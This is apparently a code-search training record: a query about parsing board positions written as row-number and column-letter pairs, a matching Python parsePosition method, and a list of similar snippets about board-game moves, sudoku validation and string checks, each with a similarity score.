op_move_postconditions(self,oldPieceCoords,newPieceCoords):\n\n # Start of new state constrution\n next_gs_board = Board.from_binary_matrix(self.board)\n next_gs_board.set_element(newPieceCoords[0], newPieceCoords[1], self.curr_player)\n next_gs_board.remove_element(oldPieceCoords[0], oldPieceCoords[1])\n next_gs_next_player = self.curr_player\n next_gs_next_move = self.FREE\n next_gs_next_pieces = set()\n\n new_gs = Eximo(next_gs_next_player,next_gs_next_move,next_gs_next_pieces,next_gs_board)\n new_gs.last_piece = newPieceCoords\n\n # Check if moved piece has reached opposite side\n if(new_gs.reach_otherside(newPieceCoords)):\n new_gs.board.remove_element(newPieceCoords[0], newPieceCoords[1])\n new_gs.next_move = self.ADDPIECE_2\n new_gs.next_pieces = new_gs.addition_viable_tiles()\n new_gs.perform_checkup()\n\n else:\n new_gs.curr_player = self.get_enemy(self.curr_player)\n\n # Check if the next_piece checkup needs to be made\n if new_gs.curr_player == self.get_enemy(self.curr_player):\n new_gs.perform_checkup()\n\n return new_gs", "def valid_moves(self, index: Tuple[int, int], board: hive.board.Board) -> Set[Tuple[int, int]]:\n raise NotImplementedError()", "def ai_move():\n\tinitial_state = map(get_filled_edges, rects)\n\tpossible_moves = []\n\tfor index, filled_edges in enumerate(initial_state):\n\t\tif filled_edges == 0:\n\t\t\tpossible_moves.extend([(index, i) for i in 'ltrb'])\n\t\telif filled_edges == 1:\n\t\t\tpossible_moves.extend(one_filled_edge(index))\n\t\telif filled_edges == 2:\n\t\t\tpossible_moves.extend(two_filled_edge(index))\n\t\telif filled_edges == 3:\n\t\t\tpossible_moves.extend(three_filled_edge(index))\n\tprint possible_moves\n\tpossible_decisions = []\n\tfor move in possible_moves:\n\t\tfinal_state = apply_move(move)\n\t\tpossible_decisions.append(is_feasible(initial_state, final_state))\n\tprint possible_decisions\n\t# randomizing when some decisions have the same weight\n\tmax_weight = max(possible_decisions)\n\t# list of indices which have the same weight\n\tmax_indices = []\n\tfor index, weight in enumerate(possible_decisions):\n\t\tif weight == max_weight:\n\t\t\tmax_indices.append(index)\n\tx = choice(max_indices)\n\tprint x\n\treturn possible_moves[x]\n\t# return possible_moves[possible_decisions.index(max(possible_decisions))]", "def reset(self) -> None:\n self.moves_taken = []", "def legalMoves( self, row, col):\n moves = []\n if(row != 0 and self.board[row - 1][col] == 0):\n moves.append(0)\n if(col != self.n - 1 and self.board[row][col + 1] == 0):\n moves.append(2)\n if(row != self.n - 1 and self.board[row + 1][col] == 0):\n moves.append(4)\n if(col != 0 and self.board[row][col - 1] == 0):\n moves.append(6)\n \n if (row + col) % 2 == 0: # can follow the cross\n if (row != 0 and col != 0 and self.board[row - 1][col - 1] == 0):\n moves.append(7)\n if (row != 0 and col != self.n - 1 and self.board[row - 1][col + 1] == 0):\n moves.append(1)\n if (row != self.n - 1 and col != self.n - 1 and self.board[row + 1][col + 1] == 0):\n moves.append(3)\n if (row != self.n - 1 and col != 0 and self.board[row + 1][col - 1] == 0):\n moves.append(5)\n\n return moves", "def test_move_onto_past(self):\n b1 = board.Board(self.small_plain)\n start = np.array((3, 3), dtype='int')\n k1 = knight.Knight(b1,start)\n # set move choice 0\n move_choice = 0\n # change the board layout to reflect the move\n k1.execute_move(move_choice)\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # try to go back in strict mode (fail)\n move_choice = 4\n k1.execute_move(move_choice, strict=True)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . . x . . . .\n . . . x K . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)\n # try to go back without strict mode\n move_choice = 4\n k1.execute_move(move_choice)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((3, 3), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . K x . . .\n . . . x x . . .\n . . . x S . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")" ]
[ "0.7330048", "0.7140586", "0.7039396", "0.697742", "0.69300544", "0.6770414", "0.676601", "0.6749859", "0.66704226", "0.66598386", "0.66426575", "0.66328067", "0.6632505", "0.66169274", "0.6604243", "0.65838623", "0.65772635", "0.6562603", "0.6525635", "0.6522035", "0.6512511", "0.6508177", "0.65074694", "0.64962894", "0.649275", "0.64880174", "0.6487537", "0.6485876", "0.64521384", "0.64492553", "0.644339", "0.6433632", "0.6427241", "0.6413817", "0.6411838", "0.6405281", "0.6404856", "0.640213", "0.6398353", "0.6391051", "0.63881075", "0.6387365", "0.63795376", "0.63748527", "0.6360954", "0.6348344", "0.6338555", "0.6322776", "0.63197756", "0.63160706", "0.63146466", "0.6309299", "0.6291828", "0.62878144", "0.6285332", "0.62805444", "0.6276508", "0.62728804", "0.6270854", "0.6265325", "0.62535477", "0.62464005", "0.6243859", "0.62199926", "0.62085533", "0.6204817", "0.6189746", "0.61852545", "0.6178696", "0.6177592", "0.61707044", "0.6168047", "0.6155129", "0.61474293", "0.6143239", "0.61329615", "0.6130371", "0.61216563", "0.6119402", "0.61167103", "0.6108297", "0.61028385", "0.6092757", "0.6091817", "0.60832435", "0.60825306", "0.60811925", "0.6077865", "0.6075925", "0.6071631", "0.60650927", "0.60582495", "0.6054288", "0.60519344", "0.6049257", "0.6042182", "0.60388064", "0.60384065", "0.60364723", "0.60340476" ]
0.63703394
44
Checking string input for format [Row][ColLetter] or [ColLetter][Row] (and not case sensitive)
def parsePosition(self, parse): if len(parse) == 2: ch1 = ord(parse[0].lower()) ch2 = ord(parse[1].lower()) maxNum = 48 + self.board.size # ascii of max row # # [Row#][ColLetter]] case if 48 < ch1 <= maxNum and 97 <= ch2 < (97 + self.board.size): return maxNum - ch1, ch2 - 97 # actual grid indexes of desired position # [ColLetter][Row#] case if 48 < ch2 <= maxNum and 97 <= ch1 < (97 + self.board.size): return maxNum - ch2, ch1 - 97 # actual grid indexes of desired position return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_valid_row_or_col(val: str):\n try:\n val = int(val)\n if 1 <= val <= 10:\n return True\n return False\n except (ValueError, TypeError):\n return False", "def must_contain_letter(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"[a-zA-Z]\", str(cell)))", "def valid_col_tester(self, state):\n vert_state = self.cols(state)\n for line in vert_state:\n line_index = vert_state.index(line)\n vert_word = self.check_word(vert_state[line_index])\n if not(vert_word):\n return False\n return True", "def valid_input(self, row, col):\n return ((row, col) not in self.marks and\n row <= WIDTH and row > 0 and\n col in COL_MAP)", "def test_has_letter(row):\n assert not sudoku.no_letters(row)", "def is_cols_valid(bd):\n for col in cols:\n seen = []\n for num in nums:\n if bd[col[num]] == \" \":\n continue\n elif bd[col[num]] not in seen:\n seen += [bd[col[num]]]\n else:\n return False\n else:\n continue\n return True", "def validRowCol(content,start,row,schedule):\n\t\t\tif validRow(content,start,row) and \\\n\t\t\t\tvalidCol(content,start,schedule):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False", "def _validate_level(self, levelText):\n if len([line for line in levelText.splitlines() if line.strip()]) != 6:\n # wrong num rows\n return False\n \n if any(len(list(line)) != 6 for line in levelText.splitlines() if line.strip()):\n # wrong num cols\n return False\n\n return True", "def is_latin_square(row_length: int, array: str) -> bool:\n # check horizontally\n row = 1\n column = 0\n numbers = []\n\n for index, digit in enumerate(array):\n # check for new row\n if index % row_length == 0:\n row += 1\n column = 0\n numbers = []\n column += 1\n print(index, digit, column, row)\n # check whether the digit is already in the current row\n if digit in numbers:\n return False\n numbers.append(digit)\n\n # check vertically\n\n return True", "def check_matrix(self, mat: Matrix) -> bool:\n matrix_expected_row_len = len(\n max([self.left_to_right_regexes, self.right_to_left_regexes], key=len)\n )\n matrix_row_strings = [\n ''.join(mat[i][j] for j in range(mat.columns)) for i in range(mat.rows)\n ]\n if matrix_expected_row_len != len(matrix_row_strings):\n raise ValueError(\n f'Matrix with {len(matrix_row_strings)} rows is incompatible with level of {matrix_expected_row_len} rows.'\n )\n\n matrix_expected_column_len = len(\n max([self.up_to_down_regexes, self.down_to_up_regexes], key=len)\n )\n matrix_column_strings = [\n ''.join(mat[j][i] for j in range(mat.rows)) for i in range(mat.columns)\n ]\n if matrix_expected_column_len != len(matrix_column_strings):\n raise ValueError(\n f'Matrix with {len(matrix_column_strings)} columns is incompatible with level of {matrix_expected_column_len} columns.'\n )\n\n for row, utd_regex, dtu_regex in itertools.zip_longest(\n matrix_column_strings,\n self.up_to_down_regexes,\n self.down_to_up_regexes,\n fillvalue=re.compile(''),\n ):\n if (utd_regex.pattern and re.fullmatch(utd_regex, row) is None) or (\n dtu_regex.pattern and re.fullmatch(dtu_regex, row) is None\n ):\n return False\n\n for row, ltr_regex, rtl_regex in itertools.zip_longest(\n matrix_row_strings,\n self.left_to_right_regexes,\n self.right_to_left_regexes,\n fillvalue=re.compile(''),\n ):\n if (ltr_regex.pattern and re.fullmatch(ltr_regex, row) is None) or (\n rtl_regex.pattern and re.fullmatch(rtl_regex, row) is None\n ):\n return False\n\n return True", "def valid_coordinate(self,row,column):\r\n if row >= 0 and row < len(self.wordsearch):\r\n if column >= 0 and column < len(self.wordsearch[0]):\r\n return True\r\n return False", "def human_go(self, board):\r\n coord_pattern = re.compile(\"[0-{}]$\".format(board.shape[1]))\r\n print(\"Enter Column and press enter.\")\r\n input_str = input(\"(from 0-6)\\n\")\r\n if not coord_pattern.match(input_str):\r\n print(\"That is not in the right format, please try again...\")\r\n return self.human_go(board)\r\n else:\r\n col = int(input_str)\r\n if board[0][col] != 0:\r\n print(\"That column is already full, please try again\")\r\n self.human_go()\r\n else:\r\n for row in board[::-1]:\r\n if row[col] == 0:\r\n row[col] = -1\r\n return board", "def validate_bed_format(row):\n assert len(row) >= 3, 'Bed Files must have at least 3 tab separated fields.'\n\n return True", "def _formatMatriculaValid(np):\n return len(np)==7 and np[:4].isdigit() and np[4:].isalpha()", "def parseCol(input):\n try:\n parsed = ord(input.upper()) - ord('A')\n except AttributeError:\n raise PositionException, \"Bad input for col; %s\" % input\n if not 0 <= parsed < CHESS_COLS:\n raise PositionException, \"Col out of range; %s parsed as %d.\" \\\n % (input, parsed)\n return parsed", "def is_rows_valid(bd):\n for row in rows:\n seen = []\n for num in nums:\n if bd[row[num]] == \" \":\n continue\n elif bd[row[num]] not in seen:\n seen += [bd[row[num]]]\n else:\n return False\n else:\n continue\n return True", "def test_asciitable_m_sep_char_in_cell(self):\n input = '''\n| Author | yada | yada2 | yada3 | yada4 | yada5 | yada6 | yada7 |\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kelly Brazil │ │ a76d46f9ecb1eff │ kellyjonbrazil@ │ Fri Feb 4 12:14 │ refactor ignore │ 1644005656 │ │\n│ │ │ 4d6cc7ad633c97c │ gmail.com │ :16 2022 -0800 │ _exceptions │ │ │\n│ │ │ ec0e99001a │ │ │ │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ 6b069a82d0fa19c │ lyterk@sent.com │ Thu Feb 3 18:13 │ Add xrandr to l │ 1643940838 │ │\n│ │ │ 8d83b19b934bace │ │ :58 2022 -0800 │ ib.py │ │ │\n│ │ │ 556cb758d7 │ │ │ │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ 6b793d052147406 │ lyterk@sent.com │ Thu Feb 3 18:13 │ Clean up types │ 1643940791 │ │\n│ │ │ f388c4d5dc04f50 │ │ :11 2022 -0800 │ │ │ │\n│ │ │ 6a3456f409 │ │ │ │ │ │\n│ │ │ │ │ │ * | operator = │ │ │\n│ │ │ │ │ │ > Union[] │ │ │\n│ │ │ │ │ │ * Rem │ │ │\n│ │ │ │ │ │ ove unused impo │ │ │\n│ │ │ │ │ │ rt Iterator │ │ │\n│ │ │ │ │ │ * R │ │ │\n│ │ │ │ │ │ emove comment │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ ce9103f7cc66689 │ lyterk@sent.com │ Thu Feb 3 18:12 │ Delete old file │ 1643940766 │ │\n│ │ │ 5dc7840d32797d8 │ │ :46 2022 -0800 │ s in template f │ │ │\n│ │ │ c7274cf1b8 │ │ │ older │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n '''\n expected = [\n {\n \"author\": \"Kelly Brazil\",\n \"yada\": None,\n \"yada2\": \"a76d46f9ecb1eff\\n4d6cc7ad633c97c\\nec0e99001a\",\n \"yada3\": \"kellyjonbrazil@\\ngmail.com\",\n \"yada4\": \"Fri Feb 4 12:14\\n:16 2022 -0800\",\n \"yada5\": \"refactor ignore\\n_exceptions\",\n \"yada6\": \"1644005656\",\n \"yada7\": None\n },\n {\n \"author\": \"Kevin Lyter\",\n \"yada\": None,\n \"yada2\": \"6b069a82d0fa19c\\n8d83b19b934bace\\n556cb758d7\",\n \"yada3\": \"lyterk@sent.com\",\n \"yada4\": \"Thu Feb 3 18:13\\n:58 2022 -0800\",\n \"yada5\": \"Add xrandr to l\\nib.py\",\n \"yada6\": \"1643940838\",\n \"yada7\": None\n },\n {\n \"author\": \"Kevin Lyter\",\n \"yada\": None,\n \"yada2\": \"ce9103f7cc66689\\n5dc7840d32797d8\\nc7274cf1b8\",\n \"yada3\": \"lyterk@sent.com\",\n \"yada4\": \"Thu Feb 3 18:12\\n:46 2022 -0800\",\n \"yada5\": \"Delete old file\\ns in template f\\nolder\",\n \"yada6\": \"1643940766\",\n \"yada7\": None\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def is_roi_col(col_name):\n return re.match(r\"[L|R][0-9]+$\", col_name)", "def _check_column(self):\n for column in np.transpose(self._board):\n col_string = ''.join(column)\n match = re.search(WIN_REGEX, col_string)\n if match:\n return match.group()[0]\n return None", "def split_well_name (well_name):\n\n letters = well_name.rstrip('0123456789')\n\n nums = well_name.lstrip(letters)\n\n\n #Do some checks to make sure it's a well name in for the format letter-letter-#-#\n if len(nums) == 0:\n raise ValueError('Something is wrong with your input, I cannot find a row number')\n\n\n for i in '0123456789':\n if i in letters:\n raise ValueError('Something is wrong with your input, I think there is a number in your column letter.')\n\n for j in nums:\n if j not in '0123456789':\n raise ValueError('Something is wrong with your input, I think there is a letter in your row number.')\n\n return letters, nums", "def valid_column(self, col: int) -> bool:\n\n return self.check_bounds(0, col) and self.grid[0][col] == \" \"", "def _is_valid_key(self, key):\n\t\t\n\t\t# If the key is not a string\n\t\tif not isinstance(key, str):\n\t\t\treturn False\n\t\telse:\n\t\t\tkey = str.upper(key)\n\t\t\n\t\t# If the given key does not match the standard notation XY\n\t\tif len(key) != 2:\n\t\t\treturn False\n\t\t\n\t\t# If the key is out of the board\n\t\tif key[0] not in self.columns or key[1] not in self.rows:\n\t\t\treturn False\n\t\t\n\t\t# Otherwise the key is valid\n\t\treturn True", "def __sudoku(A):\r\n if not sudoku_isready(A):\r\n print(\"Invalid Grid\")\r\n return None\r\n else:\r\n n = len(A)\r\n x, seen = isqrt(n), [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_getline(A, i)\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_getcol(A, i)\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_region_to_line(sudoku_getregion(A, i))\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n return \"Valid\"", "def _validateRowCol(self, rows, cols, numRow, numCol, dvName):\n if rows is not None:\n rowArr = np.array(rows)\n if np.max(rowArr) > numRow:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"Design var has \"\n + str(numRow)\n + \" rows and index up to \"\n + str(np.max(rowArr))\n + \" was specified: \"\n + str(rows)\n )\n if np.min(rowArr) < 1:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"Row index less than 1 specified: \"\n + str(rows)\n )\n if len(rows) != len(set(rows)):\n # duplicates\n raise Error(\"Duplicate indices specified in the rows of design variable \" + dvName + \": \" + str(rows))\n\n if cols is not None:\n colArr = np.array(cols)\n if np.max(colArr) > numCol:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"Design var has \"\n + str(numCol)\n + \" cols and index up to \"\n + str(np.max(colArr))\n + \" was specified: \"\n + str(cols)\n )\n if np.min(colArr) < 1:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"col index less than 1 specified: \"\n + str(cols)\n )\n if len(cols) != len(set(cols)):\n # duplicates\n raise Error(\"Duplicate indices specified in the cols of design variable \" + dvName + \": \" + str(cols))", "def valid_guess(self, row, col):\n # if row nor col is at an edge space, returns False\n if not isinstance(row, int) or not isinstance(col, int):\n return False\n # ensures no corner spaces have been selected\n if row < 1 or row > 8:\n return False\n if col < 1 or col > 8:\n return False\n return True", "def check_horizontal_rule(line):\n if line.count('-') >= 3 and contains_only_char(line, '-'):\n return True, '<hr></hr>'\n if line.count('*') >= 3 and contains_only_char(line, '*'):\n return True, '<hr></hr>'\n if line.count('_') >= 3 and contains_only_char(line, '_'):\n return True, '<hr></hr>'\n return False, ''", "def checkRows( self ):\n\n for x in [0,3,6]:\n firstVal = self.__grid[x]\n secondVal = self.__grid[x+1]\n thirdVal = self.__grid[x+2]\n\n compiledVal = str(firstVal) + str(secondVal) + str(thirdVal)\n\n if 'xx' in compiledVal.lower():\n\n return ('X', compiledVal)\n\n elif 'oo' in compiledVal.lower():\n\n return ('O', compiledVal) \n\n elif compiledVal.lower() == 'x2x' or \\\n compiledVal.lower() == 'x5x' or \\\n compiledVal.lower() == 'x8x':\n\n return ('X', compiledVal)\n \n return None", "def is_valid_index (wordsearch, line_num, col_num):\n if ((line_num >= 0) and (line_num < len(wordsearch))):\n if ((col_num >= 0) and (col_num < len(wordsearch[line_num]))):\n return True\n return False", "def checkio(game_result: List[str]) -> str:\n # row check\n for row in game_result:\n if row == \"XXX\":\n return \"X\"\n if row == \"OOO\":\n return \"O\"\n # column check\n if game_result[0][0] != '.' and game_result[0][0] == game_result[1][0] == game_result[2][0]:\n return game_result[0][0]\n if game_result[0][1] != '.' and game_result[0][1] == game_result[1][1] == game_result[2][1]:\n return game_result[0][1]\n if game_result[0][2] != '.' and game_result[0][2] == game_result[1][2] == game_result[2][2]:\n return game_result[0][2]\n # diagonal check\n if game_result[0][0] != '.' and game_result[0][0] == game_result[1][1] == game_result[2][2]:\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] != '.' and game_result[0][2] == game_result[1][1] == game_result[2][0]:\n return game_result[1][1]\n return \"D\"", "def CheckLabel(Line): \n for i in Line:\n if i == '\\t': #can't detect leading tabs, stops at the first \\ \n raise InputError(Line,\"malformed input\") \n elif i != ' ':\n break", "def validate_square(cls, square):\n if len(square) > 3:\n raise ValueError('Invalid square')\n\n cls._get_row_fow_letter(square[0])\n square_column = int(square[1:])\n if square_column not in range(1, 11):\n raise ValueError('The number of the column must be '\n 'an integer between 1 to 10')", "def check_row(row):\n \n if len(row) != _ncols:\n raise ValueError(\"Row contains {0} columns, expected {1}!\\n\\n{2}\\n\".format(len(row), _ncols, row))", "def _parse_row(row: str):\n final_row = []\n for char in row:\n\n # any number N expands into N spaces\n if char in \"12345678\":\n for i in range(int(char)):\n final_row.append(EMPTY_SPACE)\n else:\n final_row.append(char)\n\n return final_row", "def test_parse_case_field_00(input_, expected):\n actual = regex.match_case_field(input_)\n assert actual == expected", "def checker(self, match=\"xw\", ranges=\"0,1\", in_a_row=True, reverse=False):\n\n res = []\n length = len(self.parse_type)\n if ranges != None:\n ranges = str(ranges)\n index_array = self.indexes(ranges)\n substring = \"\"\n\n for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1): #xd lol\n if idx in index_array:\n substring += self.parse_type[idx]\n\n if in_a_row == True:\n return (match in substring)\n if in_a_row == False:\n target = 0\n for i in substring:\n target += (match[target] == i)\n return (target == maxi)\n if in_a_row == None:\n for i in self.parse_type:\n if i in match:\n match = match.replace(i, '', 1)\n return (match == \"\")\n return None", "def checkColumns( self ):\n\n for x in list(range(0,3)):\n firstVal = self.__grid[x]\n secondVal = self.__grid[x+3]\n thirdVal = self.__grid[x+6]\n\n compiledVal = str(firstVal) + str(secondVal) + str(thirdVal)\n\n if 'xx' in compiledVal.lower():\n return ('X', compiledVal)\n\n elif 'oo' in compiledVal.lower():\n return ('O', compiledVal)\n\n elif compiledVal.lower() == 'x4x' or \\\n compiledVal.lower() == 'x5x' or \\\n compiledVal.lower() == 'x6x':\n\n return ('X', compiledVal) \n\n return None", "def valid_sudoku(table):\r\n # check rows\r\n for row in table:\r\n row_dict = {}\r\n for elem in row:\r\n if elem != \".\":\r\n row_dict[elem] = row_dict.get(elem, 0) + 1\r\n if row_dict[elem] > 1:\r\n return False\r\n # check columns\r\n for i in range(9):\r\n col_dict = {}\r\n for j in range(9):\r\n elem = table[j][i]\r\n if elem != \".\":\r\n col_dict[elem] = col_dict.get(elem, 0) + 1\r\n if col_dict[elem] > 1:\r\n return False\r\n\r\n # check squares\r\n for i in range(3):\r\n for j in range(3):\r\n square_dict = {}\r\n for x in range(3):\r\n for y in range(3):\r\n elem = table[i*3 + x][j*3 + y]\r\n if elem != \".\":\r\n square_dict[elem] = square_dict.get(elem, 0) + 1\r\n if square_dict[elem] > 1:\r\n return False\r\n return True", "def is_valid_part1(line):\n char_min, char_max, required_char, password = parse_line(line)\n char_count = password.count(required_char)\n if (char_min <= char_count <= char_max):\n return True\n return False", "def check_full_board(self): #rows then columns\n for row in self.board:\n for column_of_row in row:\n if column_of_row == ' ':\n return False\n return True", "def make_rowcol(string):\n rowlens = [len(x) + 1 for x in string.split(\"\\n\")]\n rowpos = []\n acc = 0\n for i in rowlens:\n acc += i\n rowpos.append(acc)\n\n def rowcol(pos):\n last = 0\n for i, k in enumerate(rowpos, 0):\n if pos < k:\n return (i, pos - last)\n last = k\n return (-1, -1)\n return rowcol", "def _row_or_col_is_header(s_count, v_count):\n if s_count == 1 and v_count == 1:\n return False\n else:\n return (s_count + 1) / (v_count + s_count + 1) >= 2. / 3.", "def validated(x, y, playing_field):\n # user_input_cell = (x, y)\n if playing_field[x][y] == '*':\n True\n else:\n return False", "def letter_check(read):\n string=\"ACTG\"\n for line_number,line in enumerate(read):\n sequence=line.rstrip()\n if any(x not in string for x in sequence):\n return 0\n return 1", "def check_column_count(cls, line):\n\n # MAGIC n_cols = n_delim + 1 (no trailing delimiter)\n cols = line.count(cls.DELIMITER) + 1\n expected = 7 # MAGIC USAA convention, not all are populated though\n return cols == expected", "def checkLineStandardCompliance(line):\n if len(line) != 5:\n print(line + \" HAS WRONG NUMBER OF COLUMNS: \" + str(len(line)))\n exit(5)", "def _check_row(self):\n match = None\n for row in self._board:\n row_string = ''.join(row)\n match = re.search(WIN_REGEX, row_string)\n if match:\n return match.group()[0]\n return None", "def get_col():\n\n while True:\n try:\n guess_letter = str(input(\"Guess a column: \\n\")).upper()\n guess = letter_and_index_conversion(guess_letter, grid_size)\n if guess in range(1, grid_size + 1):\n return guess\n else:\n print(\"Bruh! That's not even in the ocean o_O\")\n except ValueError:\n print(\n f\"\\nPlease enter a letter for the column between {alphabet_list[0]} and {alphabet_list[grid_size - 1]}\"\n )", "def checkio(game_result: List[str]) -> str:\n # row check\n if \"XXX\" in game_result:\n return \"X\"\n if \"OOO\" in game_result:\n return \"O\"\n # column check\n if game_result[0][0] == game_result[1][0] == game_result[2][0] != '.':\n return game_result[0][0]\n if game_result[0][1] == game_result[1][1] == game_result[2][1] != '.':\n return game_result[0][1]\n if game_result[0][2] == game_result[1][2] == game_result[2][2] != '.':\n return game_result[0][2]\n # diagonal check\n if game_result[0][0] == game_result[1][1] == game_result[2][2] != '.':\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] == game_result[1][1] == game_result[2][0] != '.':\n return game_result[1][1]\n return \"D\"", "def test_clean_row_lowercase(self):\n\t\tobj_ut = sentiment.clean_row(\n\t\t\t'100\\tAn APPLE so GOODforme')\n\t\tself.assertEqual(obj_ut[1], \"an apple so goodforme\")", "def check_cols(self):\r\n for i in range(3):\r\n if self.grid[i][-1] != ' ' and self.grid[i][-1] == self.grid[i+3][-1] and self.grid[i+3][-1] == self.grid[i+6][-1]:\r\n return (i, (self.grid[i], self.grid[i+6]))\r\n return (-1, None)", "def toindex(col, row):\n a2z = 'ABCDEFGHIJLKMNOPQRSTUVWXYZ'\n\n total = 0\n mult = 0\n for char in col:\n total += (a2z.find(char) + (26 * mult))\n mult += 1\n\n return total, row - 1", "def parse_cell_ref(s):\n row_num = None\n col_num = None\n for c in s.upper():\n n = ord(c)\n if 48 <= n <= 57: # a digit\n if row_num is None:\n row_num = n - 48\n else:\n row_num = row_num * 10 + n - 48\n elif 65 <= n <= 90: # a letter\n if col_num is None:\n col_num = n - 65\n else:\n col_num = (col_num + 1) * 26 + n - 65\n return (row_num - 1, col_num,)", "def is_valid_position(self, somerow, somecol):\n valid_row = 0 <= somerow <= (self.size-1)\n valid_col = 0 <= somecol <= (self.size-1)\n #need to use self.size - 1 because while we're thinking of an 8x8 chess board, the computer is thinking of a 0x7 chess board\n return valid_row and valid_col", "def caseStr2Int(self,c):\n\n err=(\n 'The square name must be 2 caracters i.e. e2,e4,b1...',\n 'Incorrect square name. Please enter i.e. e2,e4,b1...'\n ) \n letters=('a','b','c','d','e','f','g','h')\n numbers=('1','2','3','4','5','6','7','8')\n \n if(len(c)!=2):\n print(err[0])\n return -1\n \n if(c[0] not in letters):\n print(err[1])\n return -1\n \n if(c[1] not in numbers):\n print(err[1])\n return -1\n \n return self.coord.index(c)", "def test_has_no_letters(row):\n assert sudoku.no_duplicates(row)", "def is_valid_input(letter_guessed):\n\n #calulate the lengh of the letters\n NumberOfCharacters = (len(letter_guessed))\n #convert input letters to Underscore\n NumberOfUnderscore = (NumberOfCharacters * \"_\")\n\n\n # All the letters in English\n EnglishLetter = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMOPQRSTUVWXYZ\"\n\n\n if NumberOfCharacters > 1:\n print(\"false\")\n\n # If the user entered English character the string will print the character a non-English character (for example, a sign such as: &, *), the string will print \"E2\n elif letter_guessed in EnglishLetter:\n print(\"true\")\n else:\n print(\"false\")", "def test_starts_letter(x):\n return x[0].isalpha()", "def is_valid_string_name(src):\n\n return src[0].isupper()", "def check_slice(self, m1, m2):\n\n if m1 == \"U'\" and m2 == \"D\" or m2 == \"U'\" and m1 == \"D\":\n return \"E' y'\"\n if m1 == \"U\" and m2 == \"D'\" or m2 == \"U\" and m1 == \"D'\":\n return \"E y\"\n if m1 == \"R\" and m2 == \"L'\" or m2 == \"R\" and m1 == \"L'\":\n return \"M x\"\n if m1 == \"R'\" and m2 == \"L\" or m2 == \"R'\" and m1 == \"L\":\n return \"M' x'\"\n if m1 == \"F\" and m2 == \"B'\" or m2 == \"F\" and m1 == \"B'\":\n return \"S' z\"\n if m1 == \"F'\" and m2 == \"B\" or m2 == \"F'\" and m1 == \"B\":\n return \"S z'\"\n\n return None", "def check_word_format(word):\n pattern = re.compile(\"[a-z]+\")\n if not(1 <= len(word) <= 5):\n print(\"BAD FORMAT: Word must be 1-5 letters long.\")\n return False\n if not(pattern.fullmatch(word)):\n print(\"BAD FORMAT: Word must be only letters (a-z, A-Z)\")\n return False\n return True", "def _check_value(self):\n value = str(self._value_field.toPlainText())\n if value=='': return True\n ACCEPTABLES_CHARS = ('1', '2', '3', '4', '5', '6', '7', '8', '9', '0',\n '.', ',', ';', ' ', '\\n', '-')\n\n for char in value:\n if not char in ACCEPTABLES_CHARS:\n return False\n if Variable.is_acceptable_arg(value):\n rows, columns = np.matrix(value).shape\n return 1 <= rows <= 4 and 1 <= columns <= 4\n else:\n return False", "def is_horizontal(line:tuple)->bool:\n return line[0][1] == line[1][1]", "def is_col_legal(self, from_col, from_row) -> bool:\n # If card is not playable - return False\n if from_col is None and from_row == -1:\n return False\n if self.solitaire[from_col, from_row].is_facedown:\n return False\n # If card is the last in a column: return True\n if self.is_leaf_card(from_col, from_row):\n # self.leaf_cards[from_col] = self.solitaire[from_col, from_row]\n return True\n # Loop through the column starting at \"from_row\"\n for i, card in enumerate(self.solitaire[from_col]):\n # 0 = no card or empty space\n if card == 0:\n break\n # Only look at cards starting AFTER\n if i > from_row:\n card_above = self.solitaire[from_col, i-1]\n if not card.can_be_moved_to(card_above):\n return False\n return True", "def check_parameter_file(filename):\n\n # Load file\n with open(filename, \"r\") as fin:\n content = 